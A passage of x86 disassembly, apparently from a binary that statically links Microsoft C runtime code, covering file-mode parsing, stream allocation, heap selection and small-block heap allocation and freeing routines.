loc_41A9AD: ; CODE XREF: sub_41A96C+37�j
push 1
pop edx
loc_41A9B0: ; CODE XREF: sub_41A96C+8B�j
; sub_41A96C+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41AA9F
cmp edx, ebx
jz loc_41AA9F
movsx eax, al
cmp eax, 54h
jg short loc_41AA3E
jz short loc_41AA2E
sub eax, 2Bh
jz short loc_41AA18
sub eax, 19h
jz short loc_41AA0E
sub eax, 0Eh
jz short loc_41A9F9
dec eax
jnz loc_41AA90
cmp [ebp+var_4], ebx
jnz loc_41AA90
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41A9F9: ; CODE XREF: sub_41A96C+6F�j
cmp [ebp+var_4], ebx
jnz loc_41AA90
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA0E: ; CODE XREF: sub_41A96C+6A�j
test cl, 40h
jnz short loc_41AA90
or ecx, 40h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA18: ; CODE XREF: sub_41A96C+65�j
test cl, 2
jnz short loc_41AA90
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA2E: ; CODE XREF: sub_41A96C+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41AA90
or ecx, eax
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA3E: ; CODE XREF: sub_41A96C+5E�j
sub eax, 62h
jz short loc_41AA8B
dec eax
jz short loc_41AA74
sub eax, 0Bh
jz short loc_41AA5D
sub eax, 6
jnz short loc_41AA90
test ch, 0C0h
jnz short loc_41AA90
or ch, 40h
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA5D: ; CODE XREF: sub_41A96C+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41AA90
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA74: ; CODE XREF: sub_41A96C+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41AA90
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA8B: ; CODE XREF: sub_41A96C+D5�j
test ch, 0C0h
jz short loc_41AA97
loc_41AA90: ; CODE XREF: sub_41A96C+72�j
; sub_41A96C+7B�j ...
xor edx, edx
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA97: ; CODE XREF: sub_41A96C+122�j
or ch, 80h
jmp loc_41A9B0
; ---------------------------------------------------------------------------
loc_41AA9F: ; CODE XREF: sub_41A96C+4A�j
; sub_41A96C+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41FEC6
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41AABD
loc_41AAB9: ; CODE XREF: sub_41A96C+25�j
xor eax, eax
jmp short loc_41AAD7
; ---------------------------------------------------------------------------
loc_41AABD: ; CODE XREF: sub_41A96C+14B�j
mov eax, [ebp+arg_C]
inc ds:dword_48A1D8
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41AAD7: ; CODE XREF: sub_41A96C+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A96C endp
; =============== S U B R O U T I N E =======================================
sub_41AADC proc near ; CODE XREF: sub_417988�p
mov edx, ds:dword_48B320
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41AB4D
mov ebx, ds:dword_48A310
mov edi, ebx
loc_41AAF8: ; CODE XREF: sub_41AADC+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41AB13
test byte ptr [ecx+0Ch], 83h
jz short loc_41AB0E
inc eax
add edi, 4
cmp eax, edx
jl short loc_41AAF8
jmp short loc_41AB4D
; ---------------------------------------------------------------------------
loc_41AB0E: ; CODE XREF: sub_41AADC+26�j
mov esi, [ebx+eax*4]
jmp short loc_41AB37
; ---------------------------------------------------------------------------
loc_41AB13: ; CODE XREF: sub_41AADC+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_417B89
pop ecx
mov ecx, ds:dword_48A310
mov [edi+ecx], eax
mov eax, ds:dword_48A310
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41AB4D
mov esi, edi
loc_41AB37: ; CODE XREF: sub_41AADC+35�j
cmp esi, ebp
jz short loc_41AB4D
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41AB4D: ; CODE XREF: sub_41AADC+12�j
; sub_41AADC+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41AADC endp
; =============== S U B R O U T I N E =======================================
sub_41AB54 proc near ; CODE XREF: sub_417B9B+1F�p
; sub_41944F+126�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_48A078
test eax, eax
jz short loc_41AB6C
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41AB6C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41AB6C: ; CODE XREF: sub_41AB54+7�j
; sub_41AB54+12�j
xor eax, eax
retn
sub_41AB54 endp
; =============== S U B R O U T I N E =======================================
sub_41AB6F proc near ; CODE XREF: sub_41AB9C+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call ds:off_424100
cmp word ptr [eax], 5A4Dh
jnz short loc_41AB9A
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_41AB9A
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_41AB9A: ; CODE XREF: sub_41AB6F+15�j
; sub_41AB6F+1C�j
pop esi
retn
sub_41AB6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB9C proc near ; CODE XREF: sub_41ACE4+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_417B30
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call ds:dword_424144 ; GetVersionExA
test eax, eax
jz short loc_41ABDF
cmp [ebp+var_88], 2
jnz short loc_41ABDF
cmp [ebp+var_94], 5
jb short loc_41ABDF
push 1
pop eax
jmp loc_41ACE1
; ---------------------------------------------------------------------------
loc_41ABDF: ; CODE XREF: sub_41AB9C+27�j
; sub_41AB9C+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4241A4 ; GetEnvironmentVariableA
test eax, eax
jz loc_41ACCE
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_41AC21
loc_41AC0E: ; CODE XREF: sub_41AB9C+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_41AC1C
cmp al, 7Ah
jg short loc_41AC1C
sub al, 20h
mov [ecx], al
loc_41AC1C: ; CODE XREF: sub_41AB9C+76�j
; sub_41AB9C+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_41AC0E
loc_41AC21: ; CODE XREF: sub_41AB9C+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_418DA0
add esp, 0Ch
test eax, eax
jnz short loc_41AC43
lea eax, [ebp+var_122C]
jmp short loc_41AC8C
; ---------------------------------------------------------------------------
loc_41AC43: ; CODE XREF: sub_41AB9C+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call ds:off_424094
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_41AC77
loc_41AC64: ; CODE XREF: sub_41AB9C+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_41AC72
cmp al, 7Ah
jg short loc_41AC72
sub al, 20h
mov [ecx], al
loc_41AC72: ; CODE XREF: sub_41AB9C+CC�j
; sub_41AB9C+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_41AC64
loc_41AC77: ; CODE XREF: sub_41AB9C+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_417880
pop ecx
pop ecx
loc_41AC8C: ; CODE XREF: sub_41AB9C+A5�j
cmp eax, ebx
jz short loc_41ACCE
push 2Ch
push eax
call sub_418F50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41ACCE
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_41ACB3
loc_41ACA5: ; CODE XREF: sub_41AB9C+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_41ACAE
mov [ecx], bl
jmp short loc_41ACAF
; ---------------------------------------------------------------------------
loc_41ACAE: ; CODE XREF: sub_41AB9C+10C�j
inc ecx
loc_41ACAF: ; CODE XREF: sub_41AB9C+110�j
cmp [ecx], bl
jnz short loc_41ACA5
loc_41ACB3: ; CODE XREF: sub_41AB9C+107�j
push 0Ah
push ebx
push eax
call sub_41881C
add esp, 0Ch
cmp eax, 2
jz short loc_41ACE1
cmp eax, 3
jz short loc_41ACE1
cmp eax, 1
jz short loc_41ACE1
loc_41ACCE: ; CODE XREF: sub_41AB9C+5C�j
; sub_41AB9C+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_41AB6F
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_41ACE1: ; CODE XREF: sub_41AB9C+3E�j
; sub_41AB9C+126�j ...
pop ebx
leave
retn
sub_41AB9C endp
; =============== S U B R O U T I N E =======================================
sub_41ACE4 proc near ; CODE XREF: _0:00419C3E�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_4241AC ; HeapCreate
test eax, eax
mov ds:dword_48B684, eax
jz short loc_41AD3A
call sub_41AB9C
cmp eax, 3
mov ds:dword_48B688, eax
jnz short loc_41AD20
push 3F8h
call sub_41AD41
pop ecx
jmp short loc_41AD2A
; ---------------------------------------------------------------------------
loc_41AD20: ; CODE XREF: sub_41ACE4+2D�j
cmp eax, 2
jnz short loc_41AD3D
call sub_41B888
loc_41AD2A: ; CODE XREF: sub_41ACE4+3A�j
test eax, eax
jnz short loc_41AD3D
push ds:dword_48B684
call ds:dword_4241A8 ; HeapDestroy
loc_41AD3A: ; CODE XREF: sub_41ACE4+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41AD3D: ; CODE XREF: sub_41ACE4+3F�j
; sub_41ACE4+48�j
push 1
pop eax
retn
sub_41ACE4 endp
; =============== S U B R O U T I N E =======================================
sub_41AD41 proc near ; CODE XREF: sub_41ACE4+34�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_48B684
call ds:dword_4240E8 ; RtlAllocateHeap
test eax, eax
mov ds:dword_48B67C, eax
jnz short loc_41AD5E
retn
; ---------------------------------------------------------------------------
loc_41AD5E: ; CODE XREF: sub_41AD41+1A�j
mov ecx, [esp+arg_0]
and ds:dword_48B674, 0
and ds:dword_48B678, 0
push 1
mov ds:dword_48B670, eax
mov ds:dword_48B680, ecx
mov ds:dword_48B668, 10h
pop eax
retn
sub_41AD41 endp
; =============== S U B R O U T I N E =======================================
sub_41AD89 proc near ; CODE XREF: sub_417C3B+17�p
; sub_41944F+4C�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_48B678
lea ecx, [eax+eax*4]
mov eax, ds:dword_48B67C
lea ecx, [eax+ecx*4]
loc_41AD99: ; CODE XREF: sub_41AD89+26�j
cmp eax, ecx
jnb short loc_41ADB1
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41ADB3
add eax, 14h
jmp short loc_41AD99
; ---------------------------------------------------------------------------
loc_41ADB1: ; CODE XREF: sub_41AD89+12�j
xor eax, eax
locret_41ADB3: ; CODE XREF: sub_41AD89+21�j
retn
sub_41AD89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADB4 proc near ; CODE XREF: sub_417C3B+23�p
; sub_41944F+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41B0D8
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41AE8A
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41AE18
push 3Fh
pop edx
loc_41AE18: ; CODE XREF: sub_41ADB4+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41AE6C
cmp edx, 20h
jnb short loc_41AE43
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41AE64
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41AE64
; ---------------------------------------------------------------------------
loc_41AE43: ; CODE XREF: sub_41ADB4+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41AE64
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41AE64: ; CODE XREF: sub_41ADB4+86�j
; sub_41ADB4+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_41AE6F
; ---------------------------------------------------------------------------
loc_41AE6C: ; CODE XREF: sub_41ADB4+6A�j
mov ecx, [ebp+var_4]
loc_41AE6F: ; CODE XREF: sub_41ADB4+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_41AE8A: ; CODE XREF: sub_41ADB4+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41AE98
push 3Fh
pop edx
loc_41AE98: ; CODE XREF: sub_41ADB4+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41AF3B
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41AEBD
mov ebx, esi
loc_41AEBD: ; CODE XREF: sub_41ADB4+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_41AECF
mov edx, esi
loc_41AECF: ; CODE XREF: sub_41ADB4+117�j
cmp ebx, edx
jz short loc_41AF36
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41AF1E
cmp ebx, 20h
jnb short loc_41AEFF
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41AF1E
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41AF1E
; ---------------------------------------------------------------------------
loc_41AEFF: ; CODE XREF: sub_41ADB4+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41AF1E
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41AF1E: ; CODE XREF: sub_41ADB4+128�j
; sub_41ADB4+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41AF36: ; CODE XREF: sub_41ADB4+11D�j
mov esi, [ebp+arg_4]
jmp short loc_41AF3E
; ---------------------------------------------------------------------------
loc_41AF3B: ; CODE XREF: sub_41ADB4+ED�j
mov ebx, [ebp+arg_0]
loc_41AF3E: ; CODE XREF: sub_41ADB4+185�j
cmp [ebp+var_C], 0
jnz short loc_41AF4C
cmp ebx, edx
jz loc_41AFCD
loc_41AF4C: ; CODE XREF: sub_41ADB4+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41AFCD
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_41AFA4
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41AF93
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41AF93: ; CODE XREF: sub_41ADB4+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41AFCD
; ---------------------------------------------------------------------------
loc_41AFA4: ; CODE XREF: sub_41ADB4+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41AFBA
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41AFBA: ; CODE XREF: sub_41ADB4+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41AFCD: ; CODE XREF: sub_41ADB4+192�j
; sub_41ADB4+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41B0D8
mov eax, ds:dword_48B674
test eax, eax
jz loc_41B0CA
mov ecx, ds:dword_48B66C
mov esi, ds:dword_4241B0
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, ds:dword_48B66C
mov eax, ds:dword_48B674
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_48B674
mov ecx, ds:dword_48B66C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_48B674
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_48B674
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41B05B
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_48B674
loc_41B05B: ; CODE XREF: sub_41ADB4+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41B0CA
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, ds:dword_48B674
push dword ptr [eax+10h]
push 0
push ds:dword_48B684
call ds:dword_4240E4 ; RtlFreeHeap
mov eax, ds:dword_48B678
mov edx, ds:dword_48B67C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_48B674
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_4182C0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_48B678
cmp eax, ds:dword_48B674
jbe short loc_41B0C0
sub [ebp+arg_0], 14h
loc_41B0C0: ; CODE XREF: sub_41ADB4+306�j
mov eax, ds:dword_48B67C
mov ds:dword_48B670, eax
loc_41B0CA: ; CODE XREF: sub_41ADB4+234�j
; sub_41ADB4+2AB�j
mov eax, [ebp+arg_0]
mov ds:dword_48B66C, edi
mov ds:dword_48B674, eax
loc_41B0D8: ; CODE XREF: sub_41ADB4+38�j
; sub_41ADB4+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_41ADB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0DD proc near ; CODE XREF: sub_417BC7+18�p
; sub_41944F+77�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_48B678
mov edx, ds:dword_48B67C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_41B11D
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41B12D
; ---------------------------------------------------------------------------
loc_41B11D: ; CODE XREF: sub_41B0DD+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_41B12D: ; CODE XREF: sub_41B0DD+3E�j
mov eax, ds:dword_48B670
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41B154
loc_41B13B: ; CODE XREF: sub_41B0DD+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B154
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41B13B
loc_41B154: ; CODE XREF: sub_41B0DD+5C�j
; sub_41B0DD+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_41B1D2
mov ebx, edx
loc_41B15B: ; CODE XREF: sub_41B0DD+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41B177
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B175
add ebx, 14h
jmp short loc_41B15B
; ---------------------------------------------------------------------------
loc_41B175: ; CODE XREF: sub_41B0DD+91�j
cmp ebx, eax
loc_41B177: ; CODE XREF: sub_41B0DD+83�j
jnz short loc_41B1D2
loc_41B179: ; CODE XREF: sub_41B0DD+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41B18F
cmp dword ptr [ebx+8], 0
jnz short loc_41B18C
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_41B179
; ---------------------------------------------------------------------------
loc_41B18C: ; CODE XREF: sub_41B0DD+A5�j
cmp ebx, [ebp+var_4]
loc_41B18F: ; CODE XREF: sub_41B0DD+9F�j
jnz short loc_41B1B7
mov ebx, edx
loc_41B193: ; CODE XREF: sub_41B0DD+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41B1A7
cmp dword ptr [ebx+8], 0
jnz short loc_41B1A5
add ebx, 14h
jmp short loc_41B193
; ---------------------------------------------------------------------------
loc_41B1A5: ; CODE XREF: sub_41B0DD+C1�j
cmp ebx, eax
loc_41B1A7: ; CODE XREF: sub_41B0DD+BB�j
jnz short loc_41B1B7
call sub_41B3E6
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41B1CB
loc_41B1B7: ; CODE XREF: sub_41B0DD:loc_41B18F�j
; sub_41B0DD:loc_41B1A7�j
push ebx
call sub_41B497
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41B1D2
loc_41B1CB: ; CODE XREF: sub_41B0DD+D8�j
xor eax, eax
jmp loc_41B3E1
; ---------------------------------------------------------------------------
loc_41B1D2: ; CODE XREF: sub_41B0DD+7A�j
; sub_41B0DD:loc_41B177�j ...
mov ds:dword_48B670, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41B1F9
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B230
loc_41B1F9: ; CODE XREF: sub_41B0DD+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41B22D
loc_41B216: ; CODE XREF: sub_41B0DD+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41B216
loc_41B22D: ; CODE XREF: sub_41B0DD+137�j
mov edx, [ebp+var_4]
loc_41B230: ; CODE XREF: sub_41B0DD+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41B259
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41B259: ; CODE XREF: sub_41B0DD+16D�j
; sub_41B0DD+183�j
test ecx, ecx
jl short loc_41B262
shl ecx, 1
inc edi
jmp short loc_41B259
; ---------------------------------------------------------------------------
loc_41B262: ; CODE XREF: sub_41B0DD+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41B27F
push 3Fh
pop esi
loc_41B27F: ; CODE XREF: sub_41B0DD+19D�j
cmp esi, edi
jz loc_41B394
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41B2F0
cmp edi, 20h
jge short loc_41B2BF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41B2ED
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_41B2F0
; ---------------------------------------------------------------------------
loc_41B2BF: ; CODE XREF: sub_41B0DD+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41B2ED
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41B2F0
; ---------------------------------------------------------------------------
loc_41B2ED: ; CODE XREF: sub_41B0DD+1D6�j
; sub_41B0DD+203�j
mov ebx, [ebp+arg_0]
loc_41B2F0: ; CODE XREF: sub_41B0DD+1B0�j
; sub_41B0DD+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41B3A0
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41B391
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_41B362
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41B350
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41B350: ; CODE XREF: sub_41B0DD+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41B391
; ---------------------------------------------------------------------------
loc_41B362: ; CODE XREF: sub_41B0DD+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41B37B
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41B37B: ; CODE XREF: sub_41B0DD+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41B391: ; CODE XREF: sub_41B0DD+24E�j
; sub_41B0DD+283�j
mov ecx, [ebp+var_8]
loc_41B394: ; CODE XREF: sub_41B0DD+1A4�j
test ecx, ecx
jz short loc_41B3A3
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41B3A3
; ---------------------------------------------------------------------------
